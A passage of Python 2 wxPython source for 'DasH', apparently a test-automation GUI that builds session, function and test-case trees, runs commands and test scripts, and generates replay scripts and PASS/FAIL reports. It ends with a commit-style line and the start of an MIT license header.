    #self.sequence_queue.put()

    # Paths come from the ini file; the log path gets a per-run subfolder.
    self.ini_setting = ConfigParser.ConfigParser()
    self.ini_setting.read(ini_file)
    self.src_path = os.path.abspath(self.ini_setting.get('dash', 'src_path'))
    self.lib_path = os.path.abspath(self.ini_setting.get('dash', 'lib_path'))
    self.log_path = os.path.abspath(self.ini_setting.get('dash', 'log_path'))
    from lib.common import create_case_folder
    sys.argv.append('-l')
    sys.argv.append('{}'.format(self.log_path))
    self.log_path = create_case_folder(self.log_path)
    if not os.path.exists(self.log_path):
        os.mkdir(self.log_path)
    self.add_src_path_to_python_path(self.src_path)

    # Send stdout/stderr to the coloured log pane (and the log file).
    self.redir = RedirectText(self.m_log, self.log_path)
    sys.stdout = self.redir
    sys.stderr = self.redir
    self.m_log.SetBackgroundColour('Black')
    self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font=wx.Font(9, family=wx.DEFAULT, style=wx.NORMAL, weight=wx.BOLD, faceName='Consolas')))
    #self.m_editor.WriteText('welcome to dash world')
    self.m_log.WriteText('Welcome to DasH!\n')
    self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')

    fileMenu = wx.Menu()
    open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
    open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
    self.m_menubar_main.Append(fileMenu, "&Open")

    self.Bind(wx.EVT_CLOSE, self.on_close)
    self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
    self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
    self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)

    # Left-hand navigator: three lazily-filled trees.
    from wx.aui import AuiNotebook
    bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE & (~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
    self.navigator = AuiNotebook(self.m_left_navigator, style=bookStyle)
    self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
    self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
    self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
    self.navigator.AddPage(self.session_page, 'SESSION')
    self.navigator.AddPage(self.function_page, 'FUNCTION')
    self.navigator.AddPage(self.case_suite_page, 'CASE')

    # Right-hand tabbed editor area.
    self.edit_area = AuiNotebook(self.m_file_editor, style=wx.aui.AUI_NB_DEFAULT_STYLE)
    self.edit_area.Bind(wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.on_close_tab_in_edit_area, self.edit_area)
    if False:
        new_page = FileEditor(self.edit_area, 'a', type=type)
        self.edit_area.AddPage(new_page, 'test')
        self.tabs_in_edit_area.append(('test'))
    self.edit_area.Enable(True)

    # Layout: navigator left (2 parts), editor/log/command right (8 parts).
    right_sizer = wx.BoxSizer(wx.VERTICAL)
    #right_sizer =wx.GridSizer( 3, 1, 0, 0 )
    left_sizer = wx.BoxSizer(wx.HORIZONTAL)
    left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
    self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
    #self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
    self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
    self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
    self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
    self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
    self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
    main_sizer = wx.BoxSizer(wx.HORIZONTAL)
    #main_sizer = wx.GridSizer( 1, 2, 0, 0 )
    nav_sizer = wx.BoxSizer()
    nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
    self.m_left_navigator.SetSizer(nav_sizer)
    #main_sizer = wx.BoxSizer(wx.HORIZONTAL)
    #main_sizer.Add(left_sizer, 3, wx.EXPAND)
    main_sizer.Add(left_sizer, 2, wx.EXPAND)
    edit_sizer = wx.BoxSizer()
    edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
    self.m_file_editor.SetSizer(edit_sizer)
    right_sizer.Add(self.m_file_editor, 6, wx.ALL | wx.EXPAND, 1)
    right_sizer.Add(self.m_log, 3, wx.ALL | wx.EXPAND, 2)
    right_sizer.Add(self.m_command_box, 0, wx.ALL | wx.EXPAND, 3)
    main_sizer.Add(right_sizer, 8, wx.EXPAND)
    self.SetSizer(main_sizer)

    # Populate the three navigator trees and set the window icon.
    self.build_session_tab()
    self.build_suite_tree()
    self.build_function_tab()
    ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
    self.SetIcon(ico)
def on_close(self, event):
    """App shutdown: dump the generated script and report, close every open
    tab, restore the real stdout/stderr, then let the close proceed."""
    self.generate_code(file_name='{}/test_script.py'.format(self.ini_setting.get('dash', 'log_path')))
    self.generate_report(filename='{}/dash_report.txt'.format(self.ini_setting.get('dash', 'log_path')))
    # BUG FIX: every page now gets on_close() -- FileEditor pages save their
    # file there; the original only closed SessionTab pages, so unsaved
    # file edits were lost on application exit.
    for index in range(0, self.edit_area.GetPageCount()):
        closing_page = self.edit_area.GetPage(index)
        if not closing_page:
            continue
        if isinstance(closing_page, SessionTab):
            name = closing_page.name
            self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
        closing_page.on_close()
    self.redir.close()
    sys.stderr = self.redir.old_stderr
    sys.stdout = self.redir.old_stdout
    event.Skip()
def generate_report(self, filename):
    """Append one PASS/FAIL/RUNNING line per launched test script to *filename*.

    Nothing is written when no scripts were launched.
    """
    report = '''Test Report
RESULT\tScript Name\n'''
    if len(self.running_process):
        with open(filename, 'a+') as f:
            f.write(report)
            for pi in self.running_process:
                name, pro = pi[:2]
                if pro.returncode is None:
                    result = 'RUNNING'
                else:
                    # BUG FIX: a zero exit status means success by the usual
                    # subprocess convention; the original marked any
                    # non-zero code as PASS.
                    result = 'PASS' if pro.returncode == 0 else 'FAIL'
                record = '\t'.join(['{}'.format(x) for x in [result, name]])
                f.write(record + '\n')
def on_close_tab_in_edit_area(self, event):
    """A notebook tab is closing: flush it and, for session tabs, drop the
    bookkeeping entry and tear down the published session object."""
    #self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
    closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
    closing_page.on_close()
    if isinstance(closing_page, (SessionTab)):
        ses_name = closing_page.name
        self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
        # Sessions are published as module globals under their own name
        # (Py2 dict.has_key); close and unpublish the session object.
        if globals().has_key(ses_name):
            #g = dict(globals())
            #globals()[ses_name]=None
            #del g[ses_name]
            globals()[ses_name].close_session()
            del globals()[ses_name]
def add_item_to_subfolder_in_tree(self, node):
    """Populate tree *node* with one child per entry of its directory.

    A vanished path marks the node red with a "Not Exists!!!" suffix.
    Directory children are flagged as having children so the lazy
    expansion handler can fill them in later.
    """
    subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
    items = get_folder_item(subfolder_path_name)
    if items is None:
        # BUG FIX: this error path referenced self.m_case_tree, which
        # appears nowhere else in this file (every other line uses
        # self.case_suite_page), so it crashed instead of flagging the node.
        self.case_suite_page.SetItemText(node, self.case_suite_page.GetItemText(node) + ' Not Exists!!!')
        self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
        return
    for i in items:
        path_name = '{}/{}'.format(subfolder_path_name, i)
        base_name = os.path.basename(i)
        item_info = wx.TreeItemData({'path_name': path_name})
        new_item = self.case_suite_page.InsertItem(node, node, base_name)
        self.case_suite_page.SetItemData(new_item, item_info)
        if os.path.isdir(path_name):
            self.case_suite_page.SetItemHasChildren(new_item)
        #self.m_case_tree.ItemHasChildren()
        #self.m_case_tree.InsertItem(new_item,new_item,'')
def build_suite_tree(self):
    """Root the CASE tree at the ini's test_suite_path (falling back to the
    current directory) and populate its first level."""
    suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
    if not os.path.exists(suite_path):
        suite_path = os.path.abspath(os.path.curdir)
    base_name = os.path.basename(suite_path)
    root = self.case_suite_page.AddRoot(base_name)
    item_info = wx.TreeItemData({'path_name': suite_path})
    self.case_suite_page.SetItemData(root, item_info)
    self.add_item_to_subfolder_in_tree(root)
    self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
    """Double-click in the CASE tree: toggle directories, open files in a
    new editor tab (tabular files get the grid editor, others the text
    editor)."""
    ht_item = self.case_suite_page.GetSelection()
    #ht_item = self.HitTest(event.GetPosition())
    item_name = self.case_suite_page.GetItemText(ht_item)
    item_data = self.case_suite_page.GetItemData(ht_item)
    if self.case_suite_page.ItemHasChildren(ht_item):
        if self.case_suite_page.IsExpanded(ht_item):
            self.case_suite_page.Collapse(ht_item)
        else:
            self.case_suite_page.ExpandAllChildren(ht_item)
    else:
        # BUG FIX: the original tested `item_name.lower() in ['.csv', ...]`,
        # which is only true when the whole name equals the extension, so
        # spreadsheet files never got the grid editor.
        if item_name.lower().endswith(('.csv', '.xlsx', '.xls')):
            type = 'grid'
        else:
            type = 'text'
        file_name = item_data.Data['path_name']
        new_page = FileEditor(self.edit_area, 'a', type=type, file_name=file_name)
        self.edit_area.AddPage(new_page, item_name)
        index = self.edit_area.GetPageIndex(new_page)
        self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self, event):
    """Lazy-load a directory's children the first time it is expanded."""
    ht_item = self.case_suite_page.GetSelection()
    try:
        item_info = self.case_suite_page.GetPyData(ht_item)
        # Only populate once: a node that already has children was filled.
        if 0 == self.case_suite_page.GetChildrenCount(ht_item):
            if os.path.isdir(item_info['path_name']):
                self.add_item_to_subfolder_in_tree(ht_item)
    except Exception as e:
        # Best-effort: ignore items without data (e.g. nothing selected).
        pass
def build_session_tab(self):
    """(Re)build the SESSION tree from the *.csv bench files in session_path.

    Each CSV describes one or more benches; every session found becomes a
    child of its bench node, carrying the session attributes as item data.
    """
    if self.session_page.RootItem:
        self.session_page.DeleteAllItems()
    session_path = os.path.abspath(self.ini_setting.get('dash', 'session_path'))
    self.session_path = session_path
    if not os.path.exists(session_path):
        session_path = os.path.abspath(os.path.curdir)
    base_name = os.path.basename(session_path)
    sessions = {}
    root = self.session_page.AddRoot(base_name)
    item_info = wx.TreeItemData({'path_name': session_path})
    self.session_page.SetItemData(root, item_info)
    self.session_page.Expand(root)
    item_list = get_folder_item(session_path)
    session_files = []
    for item in item_list:
        if os.path.isfile('{}/{}'.format(session_path, item)) and '{}'.format(item).lower().strip().endswith('.csv'):
            session_files.append(item)
    for csv_file in sorted(session_files):
        try:
            ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
            for bench in ses_in_bench:
                for ses in ses_in_bench[bench]:
                    # Resolve a relative login_step script against session_path.
                    if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
                        ses_in_bench[bench][ses].update(
                            {'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
                        )
            sessions.update(ses_in_bench)
        except Exception as e:
            # Skip malformed bench files.
            pass
    root = self.session_page.GetRootItem()
    for file_name in sorted(sessions.keys()):
        item_name = os.path.basename(file_name)
        item_info = wx.TreeItemData({'file_name': file_name})
        new_bench = self.session_page.InsertItem(root, root, item_name)
        # BUG FIX: item data was attached through self.case_suite_page even
        # though the items belong to self.session_page; use the owning tree.
        self.session_page.SetItemData(new_bench, item_info)
        for ses in sorted(sessions[file_name]):
            item_info = wx.TreeItemData({'attribute': sessions[file_name][ses]})
            new_item = self.session_page.InsertItem(new_bench, new_bench, ses)
            self.session_page.SetItemData(new_item, item_info)
    self.session_page.Expand(root)
    first_child = self.session_page.GetFirstChild(root)
    self.session_page.Expand(first_child[0])
def on_LeftDClick_in_Session_tab(self, event):
    """Double-click on a session: open a SessionTab and create the session.

    Derives a unique tab/global name from the tree label, instantiates the
    SessionTab, and registers the session object as a module-level global
    so the command box can address it by name.
    """
    event.Skip()
    ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
    self.session_page.GetItemText(self.session_page.GetSelection())
    session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
    # Only leaf items carry an 'attribute' dict; bench nodes are ignored.
    if session_attribute.Data.has_key('attribute'):
        info(session_attribute.Data['attribute'])
        counter = 1
        original_ses_name = ses_name
        # Suffix _1, _2, ... until the tab name is unique.
        while ses_name in self.tabs_in_edit_area:
            ses_name = '{}_{}'.format(original_ses_name, counter)
            counter += 1
        if globals().has_key(ses_name):
            # Name clashes with an existing global; try a '_' prefix once.
            if not globals().has_key('_{}'.format(ses_name)):
                info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
                ses_name = '_{}'.format(ses_name)
                self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
            else:
                error(("variable '{}' is existed in global, please change the name".format(ses_name)))
                return
        new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path)
        window_id = self.edit_area.AddPage(new_page, ses_name)
        index = self.edit_area.GetPageIndex(new_page)
        self.edit_area.SetSelection(index)
        self.tabs_in_edit_area.append(ses_name)
        self.sessions_alive.update({ses_name: new_page.name})
        attribute = session_attribute.Data['attribute']
        # Placeholder path; add_new_session_to_globals rewrites it to the
        # real `log_path` variable in the generated replay script.
        log_path = 'a_fake_log_path_for_auto_script'
        attribute['log_path'] = log_path
        self.add_new_session_to_globals(new_page, '{}'.format(attribute))
        #globals().update({ses_name: new_page.session})
def add_new_session_to_globals(self, new_page, args_str):
    """Bind *new_page* as a module-level global and record the dut() call.

    The recorded command replaces the fake log path placeholder with the
    real `log_path` variable and forces 'not_call_open' to False so the
    generated script actually opens the session when replayed.
    """
    if globals().has_key(new_page.name):
        if globals()[new_page.name] == None:
            pass
        else:
            error('{} already '.format(new_page.name))
    else:
        globals().update({new_page.name: new_page})
        self.add_cmd_to_sequence_queue('{} = dut.dut(name= "{}", **{})'.format(new_page.name, new_page.name, args_str.replace("'a_fake_log_path_for_auto_script'", 'log_path').replace("'not_call_open': True,", "'not_call_open': False,")), 'dut')
        #session = dut(name, **attributes)
def on_command_enter(self, event):
    """Execute the command typed in the command box.

    The command is parsed as 'module.class.function args' or
    'module.function args', resolved against this module's globals, and
    run on a worker thread so the GUI stays responsive. Successful
    commands are appended to the history / recorded sequence.
    """
    info('called on_command_enter')
    cmd = self.m_command_box.GetValue()
    self.m_command_box.Clear()
    if cmd.strip() == '':
        return
    module, class_name, function, args = parse_command_line(cmd)
    #args[0]=self.sessions_alive['test_ssh'].session
    if module != '' or class_name != '' or function != '':
        instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module, class_name, function, args, globals())
        call_function = None
        if class_name != "":
            call_function = getattr(instance_name, function_name)
            #(*new_argvs,**new_kwargs)
        else:
            call_function = instance_name#(*new_argvs,**new_kwargs)
        # Run on a worker thread; the GUI thread must not block.
        th = threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
        th.start()
        self.add_cmd_to_history(cmd, module, str_code)
    else:
        error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
def add_src_path_to_python_path(self, path):
    """Prepend each ';'-separated entry of *path* to sys.path.

    Entries already present are skipped; entries that do not exist on
    disk are reported and ignored.
    """
    for entry in path.split(';'):
        if entry in sys.path:
            info('path {} already in sys.path'.format(entry))
            continue
        abspath = os.path.abspath(entry)
        if os.path.exists(abspath):
            sys.path.insert(0, abspath)
        else:
            warn('path {} is not existed, ignored to add it into sys.path'.format(entry))
def on_key_down(self, event):
    """Intercept special keys in the command box.

    Tab submits the current text with a trailing tab appended; a second
    combo appends '?' and submits. Everything else is passed through.
    """
    #error(event.KeyCode)
    keycode = event.KeyCode
    if keycode == wx.WXK_TAB:
        self.m_command_box.AppendText('\t')
        self.on_command_enter(event)
    elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
        # NOTE(review): wx.PAPER_ENV_INVITE is a paper-size constant, not
        # a key code; given the '?' appended below this branch presumably
        # meant Shift+'/' — confirm the intended key and fix the constant.
        self.m_command_box.AppendText('?')
        self.on_command_enter(event)
    else:
        event.Skip()
def on_key_up(self, event):
    """Arrow-key history navigation for the command box.

    Up/Down replace the box contents with the previous/next entry of the
    command-history ring; other keys (except Tab) are passed through.
    """
    keycode = event.KeyCode
    increase = False
    if keycode == wx.WXK_UP:
        pass
    elif keycode == wx.WXK_DOWN:
        increase = True#
    if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
        self.m_command_box.Clear()
        self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index, self.history_cmd, increase=increase)
        self.m_command_box.AppendText(new_command)
    if keycode in [wx.WXK_TAB]:
        # Swallow Tab; on_key_down already handled its submission.
        pass
    else:
        event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code):
    """Append *cmd* to the history (skipping an immediate repeat) and
    record the generated code line in the replay sequence."""
    if not self.history_cmd or self.history_cmd[-1] != cmd:
        self.history_cmd.append(cmd)
    # Index points one past the newest entry for ring-list navigation.
    self.history_cmd_index = len(self.history_cmd)
    self.add_cmd_to_sequence_queue(str_code, module_name)
    #self.sequence_queue.put([cmd, datetime.now()])
def build_function_tab(self):
    """Populate the FUNCTION tree with the modules under src_path.

    Every module becomes a top-level node; its public functions are leaf
    items and its classes become nodes holding their public methods. Item
    data stores the dotted name later typed into the command box.
    """
    src_path = os.path.abspath(self.src_path)
    if not os.path.exists(src_path):
        src_path = os.path.abspath(os.path.curdir)
    base_name = os.path.basename(src_path)
    root = self.function_page.AddRoot(base_name)
    item_info = wx.TreeItemData({'name': src_path})
    self.function_page.SetItemData(root, item_info)
    modules = get_folder_item(src_path)
    if modules is None:
        self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
        self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
        return
    for module_file in modules:
        module_name = os.path.basename(module_file).split('.')[0]
        new_module = self.function_page.InsertItem(root, root, module_name)
        file, path_name, description = imp.find_module(module_name)
        try:
            lmod = imp.load_module(module_name, file, path_name, description)
        finally:
            # BUG FIX: imp.find_module returns an open file the caller
            # must close; the original leaked one handle per module.
            if file:
                file.close()
        for attr in sorted(dir(lmod)):
            if attr.startswith('__'):
                continue
            attr_obj = getattr(lmod, attr)
            attr_type = type(attr_obj)
            if attr_type == types.FunctionType:
                new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format(attr))
                item_info = wx.TreeItemData({'name': '{}.{}'.format(module_name, attr)})
                self.function_page.SetItemData(new_item, item_info)
            elif attr_type == types.TypeType:
                class_obj = getattr(lmod, attr)
                new_class = self.function_page.InsertItem(new_module, new_module, attr)
                item_info = wx.TreeItemData({'name': '{}.{}'.format(module_name, attr)})
                # BUG FIX: the class's item data was attached to new_item
                # (the previous function leaf) instead of the class node.
                self.function_page.SetItemData(new_class, item_info)
                for attr_in_class in sorted(dir(class_obj)):
                    if attr_in_class.startswith('__'):
                        continue
                    attr_obj = getattr(class_obj, attr_in_class)
                    attr_type = type(attr_obj)
                    if attr_type == types.MethodType:
                        item_info = wx.TreeItemData({'name': '{}.{}.{}'.format(module_name, attr, attr_in_class)})
                        new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
                        self.function_page.SetItemData(new_item, item_info)
    self.function_page.Expand(root)
    first_child = self.function_page.GetFirstChild(root)
    self.function_page.Expand(first_child[0])
def on_LeftDClick_in_Function_tab(self, event):
    """Double-click on a function/method: pre-type its dotted name into
    the command box so the user only has to add arguments."""
    event.Skip()
    select_item = self.function_page.GetSelection()
    fun_name = self.function_page.GetItemData(select_item)
    text_in_tree = self.function_page.GetItemText(select_item)
    if fun_name != None and fun_name.Data.has_key('name'):
        cmd = fun_name.Data['name']
        info('click item in Functions tab: {}'.format(fun_name.Data['name']))
        # Queue all UI updates with CallAfter so they run on the GUI
        # thread after this handler returns.
        wx.CallAfter(self.m_command_box.Clear)
        wx.CallAfter(self.m_command_box.AppendText, cmd + ' ')
        wx.CallAfter(self.m_command_box.SetFocus)
        wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
        wx.CallAfter(self.m_command_box.Refresh)
def on_right_down_in_function_tab(self, event):
    """Show the FUNCTION tree's context menu (single 'Refresh' entry)."""
    menu = wx.Menu()
    refresh_item = wx.MenuItem(menu, wx.NewId(), "Refresh")
    menu.AppendItem(refresh_item)
    self.Bind(wx.EVT_MENU, self.on_refresh_function_page, refresh_item)
    self.PopupMenu(menu, event.GetPosition())
def on_refresh_function_page(self, event):
    """Context-menu 'Refresh': rebuild the FUNCTION tree from scratch."""
    self.function_page.DeleteAllItems()
    self.build_function_tab()
    info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name):
    """Record *cmd* (with a timestamp) for script generation and remember
    that *module_name* must be imported by the generated script."""
    if self.import_modules.has_key(module_name):  # Python 2 idiom
        pass
    else:
        self.import_modules.update({module_name: module_name})
    self.sequence_queue.put([cmd, datetime.now()])
def generate_code(self, file_name):
    """Flush the recorded command sequence into a runnable Python script.

    The generated script sets up sys.path, imports every module recorded
    via add_cmd_to_sequence_queue, replays the commands inside try/except
    and closes any dut sessions on both the failure and success paths.
    Nothing is written when no command was recorded.

    @param file_name: path of the script file to append to.
    """
    str_code = """#created by DasH
if __name__ == "__main__":
    import sys, traceback
    sys.path.insert(0,r'{}')
    sys.path.insert(0,r'{}')
    import lib.common
    log_path= '../log/tmp'
    log_path= lib.common.create_case_folder()
    try:
""".format(self.src_path, self.lib_path)
    sessions = []
    for module in self.import_modules:
        str_code += '        import {mod}\n'.format(mod=module)
    no_operation = True
    while True:
        try:
            cmd, timestamp = self.sequence_queue.get(block=False)[:2]
            str_code += '        {} #{}\n'.format(cmd, timestamp.isoformat(' '))
            # Remember variables bound to dut sessions so the generated
            # script can close them.
            if cmd.find('dut.dut(') != -1:
                sessions.append(cmd.split('=')[0].strip())
            no_operation = False
        except Exception as e:
            # Queue.Empty: all recorded commands have been consumed.
            break
    # Failure path: print the traceback, close sessions, exit non-zero.
    # BUG FIX: the original emitted 'traceback.traceback.format_exc()',
    # which raises AttributeError in the generated script; the module
    # function is traceback.format_exc().
    str_code += '    except Exception as e:\n'
    str_code += '        print(traceback.format_exc())\n'
    for ses in sessions:
        str_code += '        {}.close_session()\n'.format(ses)
    str_code += '        sys.exit(-1)\n'
    # Success path: close sessions after the try block completes.
    for ses in sessions:
        str_code += '    {}.close_session()\n'.format(ses)
    info(str_code)
    if not no_operation:
        with open(file_name, 'a+') as f:
            f.write(str_code)
def on_right_down_in_case_tab(self, event):
    """Show the CASE tree's context menu: Run Test / Kill Test."""
    menu = wx.Menu()
    run_item = wx.MenuItem(menu, wx.NewId(), "Run Test")
    kill_item = wx.MenuItem(menu, wx.NewId(), "Kill Test")
    menu.AppendItem(run_item)
    menu.AppendItem(kill_item)
    self.Bind(wx.EVT_MENU, self.on_run_script, run_item)
    self.Bind(wx.EVT_MENU, self.on_kill_script, kill_item)
    self.PopupMenu(menu, event.GetPosition())
def on_kill_script(self, event):
    """Terminate the process attached to the selected case item, if any.

    A still-running process (returncode None) is terminated; a finished
    one only has its PASS/FAIL result logged (non-zero returncode = FAIL).
    """
    hit_item = self.case_suite_page.GetSelection()
    item_name = self.case_suite_page.GetItemText(hit_item)
    item_data = self.case_suite_page.GetItemData(hit_item).Data
    if item_data.has_key('PROCESS'):
        p = item_data['PROCESS']
        name = item_data['FULL_NAME']
        info('script:{}, returncode:{}'.format(name, p.returncode))
        if p.returncode is None:
            #if p.is_alive():
            # NOTE(review): Popen.returncode stays None until poll()/wait()
            # is called, so an already-finished process may still be
            # terminated here — confirm whether poll() should run first.
            info('Terminate alive process {}:{}'.format(item_name, p.pid))
            p.terminate()
        else:
            result = 'FAIL' if p.returncode else 'PASS'
            info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
def on_run_script(self, event):
    """Run the selected test script in a new console process.

    The tree label may contain extra quoted arguments after the script
    name; they are split shlex-style and passed through together with
    '-l <log_path>'. The Popen object is stored on the tree item so
    on_kill_script can manage it.
    """
    hit_item = self.case_suite_page.GetSelection()
    item_name = self.case_suite_page.GetItemText(hit_item)
    import shlex
    lex = shlex.shlex(item_name)
    lex.quotes = '"'
    lex.whitespace_split = True
    # First token is the script name itself; the rest are its arguments.
    script_and_args = list(lex)[1:]
    item_data = self.case_suite_page.GetItemData(hit_item).Data
    script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
    from lib.common import run_script
    from multiprocessing import Process, Queue
    import subprocess
    # Kill any previous run of this item before starting a new one.
    self.on_kill_script(event)
    #queue = Queue()
    try:
        if os.path.exists('script_runner.exe'):
            # Packaged runner available: launch through it.
            execute = 'script_runner.exe'
            cmd = [execute, script_name] + script_and_args + ['-l', '{}'.format(self.log_path)]
            #p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
        else:
            cmd = [sys.executable, script_name] + script_and_args + ['-l', '{}'.format(self.log_path)]
        # NOTE(review): original indentation was ambiguous — if this Popen
        # belongs only to the else-branch, the script_runner.exe branch
        # never assigns `p` and the lines below raise NameError; confirm
        # it is meant to be common to both branches (as assumed here).
        p = subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_CONSOLE)
        self.case_suite_page.GetItemData(hit_item).Data['PROCESS'] = p
        self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME'] = item_name
        info('start process {} :{}'.format(item_name, p.pid))
        self.running_process.append([item_name, p])
        #p.join() # this blocks until the process terminates
        time.sleep(1)
    except Exception as e:
        import traceback
        error(traceback.format_exc())
    #p = Process(target=run_script, args=[script_name, script_and_args])
    #p.start()
def polling_running_cases(self):
    """Walk every tracked case record in dict_test_report.

    Record layout is [start_time, end_time, duration, return_code, proc],
    keyed as dict_test_report[pid][case_name]. Actual status polling of
    the process is still TODO.
    """
    for pid in self.dict_test_report:
        for case_name in self.dict_test_report[pid]:
            # BUG FIX: the original unpacked the literal list [case_name]
            # (one element) into five names, raising ValueError on the
            # first iteration; unpack the stored record instead.
            start_time, end_time, duration, tmp_return_code, proc = self.dict_test_report[pid][case_name][:5]
            #todo: polling proc status and fill report
def add_newe_case_to_report(self, pid, case_name, proc):
    """Register a freshly started case under *pid* in dict_test_report.

    Record layout: [start_time, end_time, duration, return_code, proc];
    end_time and return_code stay None until the case finishes.
    """
    record = [datetime.now(), None, 0, None, proc]
    self.dict_test_report.setdefault(pid, {})[case_name] = record
def update_case_status(self, pid, case_name, return_code=None):
    """Refresh one case record in dict_test_report.

    With return_code=None the case is still running: only its duration is
    refreshed. Otherwise the case finished: end time, duration and the
    final return code are stored.
    """
    now = datetime.now()
    start_time, end_time, duration, tmp_return_code, proc = self.dict_test_report[pid][case_name]
    duration = (now - start_time).total_seconds()
    if return_code is None:
        # Still running: keep end_time / return_code untouched.
        self.dict_test_report[pid][case_name] = [start_time, end_time, duration, tmp_return_code, proc]
    else:
        # BUG FIX: the original wrote dict_test_report[case_name][pid],
        # swapping the key order used everywhere else (pid first), which
        # raised KeyError when a case completed.
        self.dict_test_report[pid][case_name] = [start_time, now, duration, return_code, proc]
    #p.terminate()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#todo: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#todo: 2017-08-19 run a script in DasH
#todo: 2017-08-19 generate test report
#todo: 2017-08-19 publish all test cases in a web page
#todo: 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#todo: 2017-08-19 build executable package for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#todo: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#todo: 2017-08-23 add tooltips for all tree items in the left panel
Save the auto-generated code file to the suite_path directory.
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
